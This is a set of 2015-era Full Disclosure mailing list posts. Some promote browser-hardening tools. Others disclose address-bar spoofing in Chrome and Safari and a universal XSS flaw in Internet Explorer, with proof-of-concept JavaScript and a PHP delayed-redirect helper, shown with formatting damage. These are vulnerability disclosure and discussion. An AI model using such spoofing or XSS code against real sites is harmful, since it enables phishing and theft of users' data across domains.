[FD] HTTPS Only 3.1 (Detailed Analysis, Browser Security, Open Source, Python)
To secure browser which is very fragile, the approach of HTTPS Only 3.1 is exceptionally simple: 1. Only HTTPS URLs(no other protocols) 2. Whitelist of domains(anything outside of whitelist is blocked) Now, let's look at threats: 1. Man in the middle - it's fixed. 2. Phishing always requires the browser to load attacker's website, so it's permanently dead here. 3. Drive-by Download - dead(if applied strictly, unable to download the executable) 4. Clickjacking - dead(attacker's web page is unreachable) 5. Address Spoofing - dead too(just unable to load the fake content) 6. XSS - almost dead(for attacker, the XSS vulnerability has to be GET, because POST requires attacker's HTML) 7. CSRF - almost dead(for attacker, the CSRF vulnerability has to be GET, and modern web applications simply don't do important things in GET, because it can be bookmarked etc, too dangerous) URLs: Project Home Page: https://www.httpsonly.net/ View Source Code: https://www.httpsonly.net/source/ Kind Regards, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Browser Security Tool: HTTPS Only 2.1 (Major Release, Open Source, Python)
When we browse the web, top threats are: 1. Remote code execution - everything is lost 2. Man in the middle - sniffing, and tampering 3. Phishing - simple, old, and still quite useful 4. Cross site scripting - data of the vulnerable domain is lost 5. CSRF - unauthorized action So, what if the browser can only access HTTPS of whitelist domains? With HTTPS, "man in the middle" is fixed. And with the whitelist, other attacks become very difficult, some even become impossible(such as phishing). Phishing is a huge headache in this era, because URLs can be hidden in legitimate redirection(such as t.co). That's why we made this simple tool(really simple - less than 200 lines of Python and JavaScript): Project Home Page - https://www.httpsonly.net/ Source Code - https://github.com/httpsonly/httpsonly Kind Regards, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Browser Security Tool: HTTPS Only (Why, How, Open Source, Python)
(@moderators The original post was too brief. This one has details.) Summary This tool completely locks browser - just HTTPS, nothing else. This tool is extremely simple - less than 100 lines of code(Python and JavaScript). Why Firefox Add-on Firesheep Brings Hacking to the Masses http://www.pcworld.com/article/208727/Firesheep_Brings_Hacking_to_the_Masses.html "Firesheep is basically a packet sniffer that can analyze all the unencrypted Web traffic" (Quite a while ago, it's become a "casual game") Yes, Mozilla said, "Gradually phasing out access to browser features for non-secure websites", in April 2015. After more than six months, they have done nothing useful. The Chrome team wanted the same stuff: https://www.chromium.org/Home/chromium-security/marking-http-as-non-secure Again, nothing significant has been achieved yet. And there is HTTPS Everywhere, with SO MANY rules: https://www.eff.org/https-everywhere/atlas/ It's still able to access HTTP by default, but there is "Block all HTTP requests". The problem: nothing happens when browser tries HTTP - there should be warning(it's incorrect behavior) and options(try HTTPS, Google Cache, etc). People complained, months ago: https://github.com/EFForg/https-everywhere/issues/1329 How PAC(Proxy auto-config) is used: If it's HTTPS, that's fine. If it's HTTP, user gets warning and options(try HTTPS, Google Cache - it has HTTPS, etc). Anything else, it goes to 0.0.0.0 It's a simple tool that does one job, and does it very well. URLs https://httpsonly.github.io/ https://github.com/httpsonly/httpsonly Best Wishes, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Open source tool for applying Google Chrome security updates
The Problem If you are a network administrator, keeping browser updated is the first thing to do for security. Chrome is a very good browser, but it's a little bit complicated to answer this simple question: what is the version of the latest stable Chrome? And for people in places such as China(no Google services), updating Chrome is not an easy task. The Solution The official blog of Chrome Releases contains a lot of information. Code of this project extracts the version number from the official blog, downloads offline installers from the official website if it's a new version, and checks whether visitor's Chrome is exactly the same. Security The best part of this project - users do not need to download and run software to be checked. This project does not even contain JavaScript. URLs Source Code https://github.com/windowschrome Home Page http://www.windowschrome.com/ Latest Stable Chrome http://www.windowschrome.com/data/version.txt ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Google Chrome Address Spoofing - Google's Opinion
It's public now: https://code.google.com/p/chromium/issues/detail?id=497588 Interesting Points: They did reproduce I can reproduce this locally They say it's DoS seems like any renderer denial-of-service (The browser does not crash!) They say it's not security issue remove security flags from this bug Finally, they stopped replying Jun 10 to Jul 2 (unbelievable huge delay) In the end, they get it Lots of phishing attacks these days tell you to call a phone number No interactions Currently, it's Severity-Medium. Kind Regards, PS http://dieyu.org/ Updated! ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Google Chrome Address Spoofing (Request For Comment)
Impact: The click to verify thing is completely broken... Anyone can be BBB Accredited Business etc. You can make whitehouse.gov display We love Islamic State :-) Note: No user interaction on the fake page. Code: * index.html script function next() { w.location.replace('http://www.oracle.com/index.html?'+n);n++; setTimeout(next();,15); setTimeout(next();,25); } function f() { w=window.open(content.html,_blank,width=500 height=500); i=setInterval(try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();},5); } /script a href=# onclick=f()Go/abr * content.html bThis web page is NOT oracle.com/b scriptlocation=http://www.oracle.com/index.html;;/script * It's online http://www.deusen.co.uk/items/gwhere.6128645971389012/ (The page says June/16/2015 - it works as we tested today) Request For Comment: We reported this to Google. They reproduced, and say It's DoS which doesn't matter. We think it's very strange, since the browser does not crash(not DoS), and the threat is obvious. What's your opinion? Kind Regards, PS We love clever tricks. We love this: http://dieyu.org/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] Safari Address Spoofing (How We Got It)
Great blog, Michal! If you change http://1.2.3.4/; in your Safari code: some URL in the real world(for example, dailymail.co.uk). Your code won't work(page of target domain is simply loaded). The trick here is: keep trying to load. Kind Regards, __ BestSec http://www.deusen.co.uk/items/bestsec/ We like it. We read it. On 2015/5/31 23:09, Michal Zalewski wrote: Well... http://lcamtuf.blogspot.com/2010/06/yeah-about-that-address-bar-thing.html On Thu, May 28, 2015 at 10:47 PM, David Leo david@deusen.co.uk wrote: Proof of concept: http://www.deusen.co.uk/items/iwhere.9500182225526788/ It works on fully patched versions of iOS and OS X. How it works: Just keep trying to load the web page of target domain. How We Got It: Safari changes address bar to new URL, BEFORE new content is loaded. BestSec http://www.deusen.co.uk/items/bestsec/ We like it. We read it. Kind Regards, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/ ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Safari Address Spoofing (How We Got It)
Proof of concept: http://www.deusen.co.uk/items/iwhere.9500182225526788/ It works on fully patched versions of iOS and OS X. How it works: Just keep trying to load the web page of target domain. How We Got It: Safari changes address bar to new URL, BEFORE new content is loaded. BestSec http://www.deusen.co.uk/items/bestsec/ We like it. We read it. Kind Regards, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Very Important Info About Major Internet Explorer Vulnerability - NOT Patched
1. Spartan - vulnerable (Windows 10) http://www.deusen.co.uk/items/insider3show.3362009741042107/SpartanWin10_screenshot.png Thanks to Zaakiy Siddiqui! 2. ?php sleep(2); header(Location: http://www.dailymail.co.uk/robots.txt;); ? Many asked for it. 3. It's Universal XSS, as we tested: Not only dailymail.co.uk - also Yahoo etc Not only injecting content - also getting private info etc. Kind Regards, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
Re: [FD] Major Internet Explorer Vulnerability - NOT Patched
'could you share the contents of 1.php?' Sure: ?php sleep(2); header(Location: http://www.dailymail.co.uk/robots.txt;); ? I'm assuming it is a delayed re-direct to the target's domain? Exactly. :-) the cloudflare scripts It's been tested without them. Kind Regards, On 2015/2/6 2:31, Barkley, Peter wrote: Thanks Zaakiy, I'm able to get the hacked page on IE9 after changing the document mode from Quirks to IE9 Standards. Screenshot attached. I'm sure you could get around having to manually switch the document mode with the appropriate DOCTYPE set in the exploit html page. David, could you share the contents of 1.php? I'm assuming it is a delayed re-direct to the target's domain? I am unable to reproduce the exploit locally with the same code (assuming my 1.php is correct), though without the cloudflare scripts. Thanks, Peter Peter Barkley | Senior Security Intelligence Analyst | Security Operations Centre | Royal Bank of Canada -Original Message- From: Fulldisclosure [mailto:fulldisclosure-boun...@seclists.org] On Behalf Of Zaakiy Siddiqui Sent: 2015, February, 04 6:46 PM To: David Leo; Joey Fowler Cc: fulldisclosure@seclists.org; b...@securitytracker.com; bugt...@securityfocus.com; cve-ass...@mitre.org Subject: Re: [FD] Major Internet Explorer Vulnerability - NOT Patched Hi David, Nice one…great find! And thanks Joey for confirming the bypass of HTTP-to-HTTPS restrictions. I can confirm that this also affects Spartan Browser (Experimental enabled in about:flags in Internet Explorer 11). I can also confirm that IE 10 is affected. IE 9 appears to not be vulnerable. Screenshots below. Regards, Zaakiy Siddiqui IE 11 Spartan - vulnerable (Windows 10) [cid:Image1466.png@14b56f08dd75bb] [cid:Image1487.png@14b56f6487b5d0] IE 10 - vulnerable (Windows 7) [cid:Image1485.jpg@14b56f5f5025ce] IE 9 - not vulnerable (Windows 7) [cid:Image1503.jpg@14b56fa3c785e0] From: David Leomailto:david@deusen.co.uk Sent: Wednesday, 4 February 2015 11:13 PM To: Joey Fowlermailto:j...@tumblr.com Cc: bugt...@securityfocus.commailto:bugt...@securityfocus.com, fulldisclosure@seclists.orgmailto:fulldisclosure@seclists.org, b...@securitytracker.commailto:b...@securitytracker.com, cve-ass...@mitre.orgmailto:cve-ass...@mitre.org Microsoft was notified on Oct 13, 2014. Joey thank you very much for your words. Kind Regards, On 2015/2/3 4:53, Joey Fowler wrote: Hi David, nice is an understatement here. I've done some testing with this one and, while there /are/ quirks, it most definitely works. It even bypasses standard HTTP-to-HTTPS restrictions. As long as the page(s) being framed don't contain X-Frame-Options headers (with `deny` or `same-origin` values), it executes successfully. Pending the payload being injected, most Content Security Policies are also bypassed (by injecting HTML instead of JavaScript, that is). It looks like, through this method, all viable XSS tactics are open! Nice find! Has this been reported to Microsoft outside (or within) this thread? -- Joey Fowler Senior Security Engineer, Tumblr On Sat, Jan 31, 2015 at 9:18 AM, David Leo david@deusen.co.uk mailto:david@deusen.co.uk wrote: Deusen just published code and description here: http://www.deusen.co.uk/items/__insider3show.3362009741042107/ http://www.deusen.co.uk/items/insider3show.3362009741042107/ which demonstrates the serious security issue. Summary An Internet Explorer vulnerability is shown here: Content of dailymail.co.uk http://dailymail.co.uk can be changed by external domain. How To Use 1. Close the popup window(confirm dialog) after three seconds. 2. Click Go. 3. After 7 seconds, Hacked by Deusen is actively injected into dailymail.co.uk http://dailymail.co.uk. Technical Details Vulnerability: Universal Cross Site Scripting(XSS) Impact: Same Origin Policy(SOP) is completely bypassed Attack: Attackers can steal anything from another domain, and inject anything into another domain Tested: Jan/29/2015 Internet Explorer 11 Windows 7 If you like it, please reply nice. Kind Regards, _ Sent through the Full Disclosure mailing list https://nmap.org/mailman/__listinfo/fulldisclosure https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/__fulldisclosure/ http://seclists.org/fulldisclosure/ ___ If you received this email in error, please advise the sender (by return email or otherwise) immediately. You have consented to receive the attached electronically at the above-noted email address; please retain a copy of this confirmation for future reference. Si vous recevez ce courriel par erreur, veuillez en aviser l'expéditeur immédiatement, par retour de courriel ou par un autre moyen. Vous avez accepté de
[FD] Major Internet Explorer Vulnerability - NOT Patched
Deusen just published code and description here: http://www.deusen.co.uk/items/insider3show.3362009741042107/ which demonstrates the serious security issue. Summary An Internet Explorer vulnerability is shown here: Content of dailymail.co.uk can be changed by external domain. How To Use 1. Close the popup window(confirm dialog) after three seconds. 2. Click Go. 3. After 7 seconds, Hacked by Deusen is actively injected into dailymail.co.uk. Technical Details Vulnerability: Universal Cross Site Scripting(XSS) Impact: Same Origin Policy(SOP) is completely bypassed Attack: Attackers can steal anything from another domain, and inject anything into another domain Tested: Jan/29/2015 Internet Explorer 11 Windows 7 If you like it, please reply nice. Kind Regards, ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/